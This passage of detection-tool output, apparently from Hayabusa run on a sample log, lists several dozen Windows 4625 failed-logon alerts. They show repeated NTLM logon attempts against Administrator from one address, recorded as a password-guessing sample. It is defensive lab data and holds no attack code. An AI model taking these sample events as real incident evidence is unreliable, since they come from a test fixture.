NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.068 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPTyAkYjcIlko5lu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OjlRoo9Sot4Fx4Th | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XslY26kw2aBw19D8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1404fakprYeqGiNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2VfIjtBcXCRlOjp | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPztyX4J9NV8EldT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 07flrrzWgsVBYaN2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vgkqkC1VvznGxR6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hMn6yDMLgLChJTL6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uSTokOJ31Tj0bLXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:39.534 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyRifC46GrNpTA4x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvNaby30vAT9drAX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wkYSOQ2bD51a4U8l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rqdOquL9Ax01RPPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nqCCiK5arcyRHha6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpyTGZLkAb0w0kgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wa2pXrZKxeZZYKAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dK0N5KeBgCze1YWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g4dHlwZjMzI5wU2s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GzF2ouP5KkRfsxnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSQxMrGlDiAOo6ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gL0rz3p1yG6RhfAT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyChoTSKgJeK6yqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG4I11dwpBM9SM3l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7foAZ5Y1igCbHap | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ATDXUljQwg8WvUVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdmXaJqQMAG2g6Ao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bjame5puT5CDeoIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0FGGVVkckmdURVh6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j0Smqw4cA4wG2Q6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLWloOhUYEQlj6y6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Tuxuykh0j5afeTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeXS6QwYhqJAOeuz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AqFSJCq5bmBW6dj1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DH1zyt1hxTgzajhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rrZxcWjUX4OgYYIb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ExtkYXSJI8F41uvw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sLh1Q3RieOoukiCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kNb2hZDxi4QrbQpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCb1TMlFj2PjH2sA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rgF42C57Nx6F3HU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KZfFH9geIrxVYowJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWz1XeyxywR0o5gS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: og1kItEC6WhqXF37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0KhaJlD6tWwF2ky | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUy0EKmjyD6ZYENA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h3MdGstPPFJDGzwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTs0ZQa6LGrKZKsY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FefzWjMXSvMdvqcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnUt9tPRSXR5mWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dehb4M6pcxi56Bkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tLXHvGiUqZyxax4W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP1gKcf1eeKm0RB1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldbN1odP77n0BOzO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: drRC8qCbPe5e4mdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lBg39AUtzZi6Q4iz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huv5YEPo1n7UiFkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9CLLwao1NDtBulxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SB88EHHhDWhvJI87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBvklueV4MZo3pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: noha7Vw85VfURHik | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wl5eIYvoKpJGUcSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsS3JTLUWcFYvxAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM6hj2bGxC124oZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3IQkVcY5iMTxCRN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v44Kp3lpGKb6Xd4j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1skdEmGlXbzUWk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feaA6lAxWjapFbAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
